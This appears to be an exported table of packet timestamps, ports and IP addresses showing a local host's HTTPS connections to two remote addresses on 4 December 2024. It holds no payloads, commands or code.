Dec 4, 2024 17:04:45.199270964 CET  443    49746  142.250.181.68  192.168.2.4
Dec 4, 2024 17:04:45.199332952 CET  49746  443    192.168.2.4     142.250.181.68
Dec 4, 2024 17:04:45.199434042 CET  49746  443    192.168.2.4     142.250.181.68
Dec 4, 2024 17:04:45.199450970 CET  443    49746  142.250.181.68  192.168.2.4
Dec 4, 2024 17:04:46.070022106 CET  49760  443    192.168.2.4     142.250.181.68
Dec 4, 2024 17:04:46.070080042 CET  443    49760  142.250.181.68  192.168.2.4
Dec 4, 2024 17:04:46.070183039 CET  49760  443    192.168.2.4     142.250.181.68
Dec 4, 2024 17:04:46.070533037 CET  49760  443    192.168.2.4     142.250.181.68
Dec 4, 2024 17:04:46.070549011 CET  443    49760  142.250.181.68  192.168.2.4
Dec 4, 2024 17:04:47.163068056 CET  49764  443    192.168.2.4     159.69.102.165
Dec 4, 2024 17:04:47.163110018 CET  443    49764  159.69.102.165  192.168.2.4
Dec 4, 2024 17:04:47.163402081 CET  49764  443    192.168.2.4     159.69.102.165
Dec 4, 2024 17:04:47.163798094 CET  49764  443    192.168.2.4     159.69.102.165
Dec 4, 2024 17:04:47.163809061 CET  443    49764  159.69.102.165  192.168.2.4
Dec 4, 2024 17:04:47.765407085 CET  443    49760  142.250.181.68  192.168.2.4
Dec 4, 2024 17:04:47.765741110 CET  49760  443    192.168.2.4     142.250.181.68
Dec 4, 2024 17:04:47.765769958 CET  443    49760  142.250.181.68  192.168.2.4
Dec 4, 2024 17:04:47.766107082 CET  443    49760  142.250.181.68  192.168.2.4
Dec 4, 2024 17:04:47.766418934 CET  49760  443    192.168.2.4     142.250.181.68
Dec 4, 2024 17:04:47.766485929 CET  443    49760  142.250.181.68  192.168.2.4
Dec 4, 2024 17:04:47.818417072 CET  49760  443    192.168.2.4     142.250.181.68
Dec 4, 2024 17:04:48.308521986 CET  49760  443    192.168.2.4     142.250.181.68
Dec 4, 2024 17:04:48.317806005 CET  49765  443    192.168.2.4     159.69.102.165
Dec 4, 2024 17:04:48.317848921 CET  443    49765  159.69.102.165  192.168.2.4
Dec 4, 2024 17:04:48.318821907 CET  49765  443    192.168.2.4     159.69.102.165
Dec 4, 2024 17:04:48.319128036 CET  49765  443    192.168.2.4     159.69.102.165
Dec 4, 2024 17:04:48.319144011 CET  443    49765  159.69.102.165  192.168.2.4
Dec 4, 2024 17:04:48.566905022 CET  443    49764  159.69.102.165  192.168.2.4
Dec 4, 2024 17:04:48.567045927 CET  49764  443    192.168.2.4     159.69.102.165
Dec 4, 2024 17:04:48.567562103 CET  49764  443    192.168.2.4     159.69.102.165
Dec 4, 2024 17:04:48.567574978 CET  443    49764  159.69.102.165  192.168.2.4
Dec 4, 2024 17:04:48.569504976 CET  49764  443    192.168.2.4     159.69.102.165
Dec 4, 2024 17:04:48.569511890 CET  443    49764  159.69.102.165  192.168.2.4
Dec 4, 2024 17:04:49.618742943 CET  443    49764  159.69.102.165  192.168.2.4
Dec 4, 2024 17:04:49.618810892 CET  443    49764  159.69.102.165  192.168.2.4
Dec 4, 2024 17:04:49.618858099 CET  49764  443    192.168.2.4     159.69.102.165
Dec 4, 2024 17:04:49.618930101 CET  49764  443    192.168.2.4     159.69.102.165
Dec 4, 2024 17:04:49.619833946 CET  49764  443    192.168.2.4     159.69.102.165
Dec 4, 2024 17:04:49.619853020 CET  443    49764  159.69.102.165  192.168.2.4
Dec 4, 2024 17:04:49.716342926 CET  443    49765  159.69.102.165  192.168.2.4
Dec 4, 2024 17:04:49.716459990 CET  49765  443    192.168.2.4     159.69.102.165
Dec 4, 2024 17:04:49.716936111 CET  49765  443    192.168.2.4     159.69.102.165
Dec 4, 2024 17:04:49.716943026 CET  443    49765  159.69.102.165  192.168.2.4
Dec 4, 2024 17:04:49.718686104 CET  49765  443    192.168.2.4     159.69.102.165
Dec 4, 2024 17:04:49.718691111 CET  443    49765  159.69.102.165  192.168.2.4
Dec 4, 2024 17:04:49.718743086 CET  49765  443    192.168.2.4     159.69.102.165
Dec 4, 2024 17:04:49.718765020 CET  443    49765  159.69.102.165  192.168.2.4
Dec 4, 2024 17:04:49.718780994 CET  49765  443    192.168.2.4     159.69.102.165
Dec 4, 2024 17:04:49.718786955 CET  443    49765  159.69.102.165  192.168.2.4
Dec 4, 2024 17:04:49.718853951 CET  49765  443    192.168.2.4     159.69.102.165
Dec 4, 2024 17:04:49.718871117 CET  443    49765  159.69.102.165  192.168.2.4
Dec 4, 2024 17:04:49.718882084 CET  49765  443    192.168.2.4     159.69.102.165
Dec 4, 2024 17:04:49.718890905 CET  443    49765  159.69.102.165  192.168.2.4
Dec 4, 2024 17:04:49.718976021 CET  49765  443    192.168.2.4     159.69.102.165
Dec 4, 2024 17:04:49.718988895 CET  443    49765  159.69.102.165  192.168.2.4
Dec 4, 2024 17:04:49.719002008 CET  49765  443    192.168.2.4     159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:49.719016075 CET49765443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:49.719033003 CET44349765159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:49.719105005 CET49765443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:49.719119072 CET44349765159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:49.719146967 CET49765443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:49.719163895 CET44349765159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:49.719166994 CET49765443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:49.719170094 CET44349765159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:49.719264030 CET49765443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:49.719280958 CET44349765159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:49.719343901 CET49765443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:49.719357014 CET44349765159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:49.719398022 CET49765443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:49.719408989 CET44349765159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:49.719429970 CET49765443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:49.719433069 CET44349765159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:50.352673054 CET49768443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:50.352710009 CET44349768159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:50.352876902 CET49768443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:50.353177071 CET49768443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:50.353189945 CET44349768159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:51.640921116 CET44349765159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:51.640995979 CET49765443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:51.641012907 CET44349765159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:51.641064882 CET49765443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:51.641993046 CET49765443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:51.642014980 CET44349765159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:51.752760887 CET44349768159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:51.752867937 CET49768443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:51.753364086 CET49768443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:51.753376007 CET44349768159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:51.755146980 CET49768443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:51.755152941 CET44349768159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:51.755321026 CET49768443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:51.755332947 CET44349768159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:51.755424023 CET49768443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:51.755439997 CET44349768159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:51.755515099 CET49768443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:51.755527020 CET44349768159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:52.525695086 CET49775443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:52.525727987 CET44349775159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:52.525777102 CET49775443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:52.526057959 CET49775443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:52.526071072 CET44349775159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:53.245398998 CET44349768159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:53.245493889 CET44349768159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:53.245529890 CET49768443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:53.245598078 CET49768443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:53.246661901 CET49768443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:53.246681929 CET44349768159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:53.530570030 CET49776443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:53.530623913 CET44349776159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:53.530702114 CET49776443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:53.530976057 CET49776443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:53.530988932 CET44349776159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:53.930313110 CET44349775159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:53.930370092 CET49775443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:53.930886984 CET49775443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:53.930895090 CET44349775159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:53.932703972 CET49775443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:53.932708979 CET44349775159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:53.932789087 CET49775443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:53.932802916 CET44349775159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:53.932842016 CET49775443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:53.932847023 CET44349775159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:53.932909966 CET49775443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:53.932921886 CET44349775159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:53.932966948 CET49775443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:53.932979107 CET44349775159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:53.933033943 CET49775443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:53.933047056 CET44349775159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:53.933100939 CET49775443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:53.933139086 CET44349775159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:53.933160067 CET49775443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:53.933172941 CET44349775159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:53.933216095 CET49775443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:53.933227062 CET44349775159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:53.933296919 CET49775443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:53.933303118 CET44349775159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:53.933336020 CET49775443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:53.933343887 CET44349775159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:54.935136080 CET44349776159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:54.935194969 CET49776443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:54.935681105 CET49776443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:54.935688972 CET44349776159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:54.937488079 CET49776443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:54.937493086 CET44349776159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:55.888061047 CET44349775159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:55.888138056 CET44349775159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:55.888150930 CET49775443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:55.888221979 CET49775443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:55.889276028 CET49775443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:55.889293909 CET44349775159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:55.990489960 CET44349776159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:55.990571976 CET44349776159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:55.990583897 CET49776443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:55.990624905 CET49776443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:55.991689920 CET49776443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:55.991709948 CET44349776159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:56.604577065 CET49782443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:56.604625940 CET44349782159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:56.604717970 CET49782443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:56.605051994 CET49782443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:56.605077028 CET44349782159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:57.676341057 CET49786443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:57.676451921 CET44349786159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:57.676558971 CET49786443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:57.676821947 CET49786443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:57.676853895 CET44349786159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:58.279876947 CET44349782159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:58.280101061 CET49782443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:58.280824900 CET49782443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:58.280838966 CET44349782159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:58.282982111 CET49782443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:58.282993078 CET44349782159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:58.283041000 CET49782443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:58.283051968 CET44349782159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:58.283087969 CET49782443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:04:58.283092022 CET44349782159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:06.095263958 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:06.095288038 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:06.376481056 CET44349804159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:06.378757000 CET49804443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:06.379218102 CET49804443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:06.379223108 CET44349804159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:06.381033897 CET49804443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:06.381041050 CET44349804159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:06.381124020 CET49804443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:06.381141901 CET44349804159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:06.381207943 CET49804443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:06.381222963 CET44349804159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:06.381230116 CET49804443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:06.381237030 CET44349804159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:06.381311893 CET49804443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:06.381330967 CET49804443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:06.381364107 CET49804443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:06.381376982 CET44349804159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:06.381548882 CET49804443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:06.381566048 CET44349804159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:06.381583929 CET49804443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:06.381592035 CET49804443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:06.381597042 CET44349804159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:06.381606102 CET44349804159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.580760002 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.580852032 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.586678028 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.586694002 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.588577986 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.588582993 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.588649988 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.588665962 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.588754892 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.588783026 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.588892937 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.588920116 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.588975906 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.588985920 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589020014 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589035034 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589194059 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589209080 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589225054 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589236975 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589299917 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589319944 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589344978 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589358091 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589409113 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589421034 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589422941 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589438915 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589452982 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589459896 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589503050 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589526892 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589566946 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589584112 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589624882 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589641094 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589656115 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589675903 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.589720011 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589750051 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589771032 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589809895 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589848995 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.589886904 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.631330967 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.631669044 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.631709099 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.631732941 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.631753922 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.631817102 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.679343939 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.679595947 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.679687023 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.679734945 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.679779053 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.679843903 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.723344088 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.723617077 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.723778963 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.723813057 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.723829031 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.723875999 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.771343946 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.771615028 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.771653891 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.771682978 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.771691084 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.771708012 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.771753073 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.815334082 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.815577984 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.815717936 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.815768957 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.815829992 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.815884113 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.833811998 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.833945990 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.834036112 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.834058046 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.834139109 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.834187984 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.834237099 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.834299088 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.834343910 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.875339985 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.875617981 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.875632048 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.875646114 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.875678062 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.875709057 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.919327021 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.957036018 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.957176924 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:07.957190990 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:07.957259893 CET49805443192.168.2.4159.69.102.165
Timestamp                            Src Port   Dst Port   Source IP        Dest IP
Dec 4, 2024 17:05:07.999332905 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:07.999634981 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:07.999712944 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:07.999771118 CET   49805      443        192.168.2.4      159.69.102.165
Dec 4, 2024 17:05:08.043339968 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.075979948 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.076083899 CET   443        49805      159.69.102.165   192.168.2.4
Dec 4, 2024 17:05:08.076119900 CET   49805      443        192.168.2.4      159.69.102.165
